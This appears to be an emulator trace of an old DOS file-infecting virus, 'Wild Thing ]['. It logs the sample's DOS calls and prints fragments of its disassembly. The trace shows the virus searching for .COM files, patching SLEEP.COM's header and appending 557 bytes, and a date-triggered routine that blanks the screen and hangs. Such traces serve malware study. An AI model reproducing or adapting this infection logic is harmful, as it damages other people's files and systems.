2018-12-25T11:45:52.733180232Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:45:52.734359898Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:45:52.735480384Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-25T11:45:52.73784721Z 72 PC: 130ec | Allocate memory
2018-12-25T11:45:52.739691742Z 61 PC: 131b2 | Open file (Filename = '')
2018-12-25T11:45:52.747156679Z 62 PC: 131ba | Close file
2018-12-25T11:45:52.750091369Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-25T11:45:52.751253081Z 74 PC: 1197c | Reallocate memory
2018-12-25T11:45:52.752936771Z 72 PC: 11991 | Allocate memory
2018-12-25T11:45:52.755574965Z 73 PC: 119b2 | Release memory
2018-12-25T11:45:52.757108943Z 72 PC: 119bd | Allocate memory
2018-12-25T11:45:52.75877092Z 73 PC: 119df | Release memory
2018-12-25T11:45:52.760773496Z 72 PC: 119f5 | Allocate memory
2018-12-25T11:45:52.762779793Z 72 PC: 119fd | Allocate memory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":2417,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:45:48.805546331Z 26 PC: 12f84 | Set disk transfer address
2018-12-25T11:45:48.806989505Z 44 PC: 12e4a | Get time 0x12e4a: cmp dh, 0
0x12e4d: je 0x12e46
0x12e4f: mov byte ptr [bp + 0x32e], dh
0x12e53: mov ah, 0x47
0x12e55: mov dl, 0
0x12e57: lea si, word ptr [bp + 0x34a]
0x12e5b: int 0x21
0x12e5d: call 0x12f46
0x12e60: call 0x12f6a
0x12e63: mov ah, 0x4e
0x12e65: lea dx, word ptr [bp + 0x2cb]
0x12e69: mov cx, 7
0x12e6c: int 0x21
0x12e6e: jb 0x12e7b
0x12e70: lea dx, word ptr [bp + 0x3a8]
0x12e74: call 0x12eaf
0x12e77: mov ah, 0x4f
0x12e79: jmp 0x12e6c
0x12e7b: lea dx, word ptr [bp + 0x2e1]
0x12e7f: mov ah, 0x3b
2018-12-25T11:45:48.809301994Z 71 PC: 12e5d | Get current directory
2018-12-25T11:45:48.812320516Z 42 PC: 12f4a | Get date 0x12f4a: cmp al, 5
0x12f4c: je 0x12f4f
0x12f4e: ret
0x12f4f: mov ah, 1
0x12f51: mov cx, 0x2020
0x12f54: int 0x10
0x12f56: mov ah, 2
0x12f58: xor dx, dx
0x12f5a: int 0x10
0x12f5c: xor ax, ax
0x12f5e: int 0x10
0x12f60: mov ah, 9
0x12f62: lea dx, word ptr [bp + 0x271]
0x12f66: int 0x21
0x12f68: jmp 0x12f68
0x12f6a: mov ah, 0x4e
0x12f6c: lea dx, word ptr [bp + 0x2d1]
0x12f70: mov cx, 7
0x12f73: int 0x21
0x12f75: jae 0x12f78
2018-12-25T11:45:48.815040087Z 78 PC: 12f75 | Find first file
2018-12-25T11:45:48.821682577Z 78 PC: 12e6e | Find first file
2018-12-25T11:45:48.834090336Z 67 PC: 12eb5 | Get or set file attributes
2018-12-25T11:45:48.840612124Z 67 PC: 12ec2 | Get or set file attributes
2018-12-25T11:45:50.515938758Z 61 PC: 12ec9 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:45:50.52440665Z 87 PC: 12ed1 | Get or set file date and time
2018-12-25T11:45:50.526531079Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:45:50.534484113Z 66 PC: 12f45 | Move file pointer
2018-12-25T11:45:50.536217866Z 64 PC: 12f17 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:45:50.539245131Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:50.54170992Z 64 PC: 13068 | Write file or device (Write 557 bytes on handle 5)
2018-12-25T11:45:50.551036122Z 87 PC: 12f2c | Get or set file date and time
2018-12-25T11:45:50.55329343Z 62 PC: 12f30 | Close file
2018-12-25T11:45:50.563078526Z 67 PC: 12f3a | Get or set file attributes
2018-12-25T11:45:50.569926671Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:50.572351761Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:50.576912324Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:50.588368715Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:50.595884511Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:50.597839093Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:50.605578068Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:50.607695069Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:50.6114261Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:50.614161598Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:50.624885604Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:50.626717085Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:50.636303676Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:50.647705736Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:50.651081653Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:50.658994519Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:50.670526058Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:50.678280171Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:50.680328454Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:50.687279778Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:50.688791033Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:50.69134397Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:50.69269687Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:50.698490429Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:50.700243729Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:50.708688591Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:50.71920815Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:50.722000806Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:50.728154552Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:50.734386691Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:50.741781617Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:50.743696957Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:50.750393283Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:50.752461318Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:50.755624053Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:50.757317861Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:50.765895834Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:50.767984192Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:50.776584484Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:50.786868512Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:50.789728447Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:50.793648453Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:50.799985123Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:50.808004763Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:50.809519146Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:50.816734131Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:50.818980905Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:50.821725688Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:50.823372701Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:50.832860186Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:50.834542606Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:50.842712268Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:50.853066825Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:50.856382574Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:50.862504252Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:50.872818412Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:50.88590435Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:50.887312311Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:50.894155174Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:50.896784462Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:50.9008395Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:50.902952441Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:50.913267461Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:50.914961895Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:50.923010534Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:50.933383888Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:50.939911132Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:50.946627549Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:50.956948511Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:50.964435211Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:50.965820251Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:50.972592811Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:50.974712161Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:50.977625628Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:50.979559183Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:50.98916533Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:50.990712319Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:50.998820998Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:51.01067887Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:51.013409155Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:51.019469337Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:51.031319898Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:51.038695158Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:51.040226244Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:51.047758058Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:51.049314801Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:51.056788366Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:51.069744122Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:51.073218665Z 59 PC: 12e83 | Change current directory
2018-12-25T11:45:51.078857488Z 59 PC: 12e8d | Change current directory
2018-12-25T11:45:51.080888967Z 26 PC: 12f84 | Set disk transfer address (See above)
2018-12-25T11:45:51.082732657Z 9 PC: 12ea4 | Display string (String= 'Wild Thing ][ ')
2018-12-25T11:45:53.281737639Z 72 PC: 8f1b9 | Allocate memory
2018-12-25T11:45:53.284048049Z 72 PC: 8f1bd | Allocate memory
2018-12-25T11:45:53.288165314Z 99 PC: 90858 | Get DBCS lead byte table pointer
2018-12-25T11:45:53.291271701Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-25T11:45:53.303048398Z 66 PC: 91f95 | Move file pointer
2018-12-25T11:45:53.304915381Z 62 PC: 91fc1 | Close file
2018-12-25T11:45:53.307299606Z 75 PC: 91fe0 | Execute program
2018-12-25T11:45:53.325248167Z 98 PC: 916f1 | Get current PSP
2018-12-25T11:45:53.32709732Z 9 PC: c605 | Display string (String= '6��r�&;] u')
2018-12-25T11:45:53.331844205Z 48 PC: c609 | Get DOS version
2018-12-25T11:45:53.335256467Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-25T11:45:53.337910693Z 2 PC: c38c | Character output (Char = '32')
2018-12-25T11:45:53.340192853Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-25T11:45:53.344452454Z 9 PC: c6d9 | Display string (String= '�����VH�VD���V@��������������_���Ku��t1��������D�����t �� ��������a1��Z�����W���� ������5���|�����(���������Nj�(��������p�^')
2018-12-25T11:45:53.348433009Z 9 PC: c6e0 | Display string (String= '�5���|�����(���������Nj�(��������p�^')
2018-12-25T11:45:53.354223775Z 61 PC: 91f88 | Open file (See above)
2018-12-25T11:45:53.365594974Z 66 PC: 91f95 | Move file pointer (See above)
2018-12-25T11:45:53.367054776Z 62 PC: 91fc1 | Close file (See above)
2018-12-25T11:45:53.369269335Z 75 PC: 91fe0 | Execute program (See above)
2018-12-25T11:45:53.392897618Z 98 PC: 916f1 | Get current PSP (See above)
2018-12-25T11:45:53.39689469Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
2018-12-25T11:45:53.398357061Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T11:45:53.399700251Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T11:45:53.400725622Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:45:53.402531443Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:45:53.403825446Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-25T11:45:53.412224849Z 62 PC: 8f8eb | Close file
2018-12-25T11:45:53.414510243Z 62 PC: 8f8f2 | Close file
2018-12-25T11:45:53.416179213Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.417495039Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.419800649Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.421463999Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.422924774Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.427933761Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.429567258Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.431066884Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.432839657Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.434328614Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.435786259Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.437799487Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.439254634Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.440614231Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.442588343Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.4440935Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.445546415Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.44791953Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.449357982Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.450636082Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.452282321Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.453725309Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.455284785Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.457011988Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.458450685Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.459775958Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.461605967Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.463356804Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.465001426Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.467109058Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-25T11:45:53.472284488Z 62 PC: 8f90e | Close file
2018-12-25T11:45:53.474125471Z 69 PC: 8f915 | Duplicate handle
2018-12-25T11:45:53.476594752Z 69 PC: 8f919 | Duplicate handle
2018-12-25T11:45:53.478268233Z 61 PC: 9387b | Open file (Filename = '')
2018-12-25T11:45:53.483973774Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-25T11:45:53.500272912Z 61 PC: 9387b | Open file (See above)
2018-12-25T11:45:53.505279602Z 68 PC: 9386b | I/O control for devices (See above)
2018-12-25T11:45:53.506988151Z 74 PC: 8f9c4 | Reallocate memory
2018-12-25T11:45:53.508972389Z 72 PC: 8f9e0 | Allocate memory
2018-12-25T11:45:53.510849126Z 72 PC: 8f9e4 | Allocate memory
2018-12-25T11:45:53.512384933Z 74 PC: 8f9fb | Reallocate memory
2018-12-25T11:45:53.514289754Z 72 PC: 8fa02 | Allocate memory
2018-12-25T11:45:53.516039678Z 72 PC: 8fa06 | Allocate memory
2018-12-25T11:45:53.517942169Z 73 PC: 8fa11 | Release memory
2018-12-25T11:45:53.519898885Z 73 PC: 8efea | Release memory
2018-12-25T11:45:53.521285615Z 74 PC: 8f003 | Reallocate memory
2018-12-25T11:45:53.522860223Z 72 PC: 8f054 | Allocate memory
2018-12-25T11:45:53.525159188Z 72 PC: 8f058 | Allocate memory
2018-12-25T11:45:53.526667253Z 73 PC: 8f060 | Release memory
2018-12-25T11:45:53.527820734Z 61 PC: 8f080 | Open file (Filename = '')
2018-12-25T11:45:53.53780579Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:45:53.543972728Z 66 PC: 8f0ad | Move file pointer
2018-12-25T11:45:53.545735858Z 62 PC: 8f0d1 | Close file
2018-12-25T11:45:53.548190832Z 75 PC: 8f0f2 | Execute program
2018-12-25T11:45:53.572152515Z 80 PC: 12be9 | Set current PSP
2018-12-25T11:45:53.573452187Z 48 PC: 12bee | Get DOS version
2018-12-25T11:45:53.576363092Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-25T11:45:53.579104507Z 101 PC: 12c74 | Get extended country info
2018-12-25T11:45:53.580563882Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-25T11:45:53.582769069Z 74 PC: 12cdc | Reallocate memory
2018-12-25T11:45:53.584516382Z 72 PC: 1355d | Allocate memory
2018-12-25T11:45:53.586274561Z 25 PC: 13596 | Get default drive
2018-12-25T11:45:53.588269332Z 71 PC: 135ad | Get current directory
2018-12-25T11:45:53.590978685Z 59 PC: 135ba | Change current directory
2018-12-25T11:45:53.596869368Z 59 PC: 135c8 | Change current directory
2018-12-25T11:45:53.604786639Z 59 PC: 135d3 | Change current directory
2018-12-25T11:45:53.608974525Z 25 PC: 12d13 | Get default drive
2018-12-25T11:45:53.610676821Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-25T11:45:53.612678545Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T11:45:53.613934628Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:45:53.616686745Z 80 PC: 1301d | Set current PSP
2018-12-25T11:45:53.618549879Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag')
2018-12-25T11:45:53.620303543Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:45:53.621939456Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:45:53.62456204Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-25T11:45:53.626765248Z 72 PC: 130ec | Allocate memory
2018-12-25T11:45:53.628712987Z 61 PC: 131b2 | Open file (Filename = '')
2018-12-25T11:45:53.635981737Z 62 PC: 131ba | Close file
2018-12-25T11:45:53.639007172Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-25T11:45:53.640130415Z 74 PC: 1197c | Reallocate memory
2018-12-25T11:45:53.644196125Z 72 PC: 11991 | Allocate memory
2018-12-25T11:45:53.645850006Z 73 PC: 119b2 | Release memory
2018-12-25T11:45:53.64733851Z 72 PC: 119bd | Allocate memory
2018-12-25T11:45:53.649755231Z 73 PC: 119df | Release memory
2018-12-25T11:45:53.651191615Z 72 PC: 119f5 | Allocate memory
2018-12-25T11:45:53.653035003Z 72 PC: 119fd | Allocate memory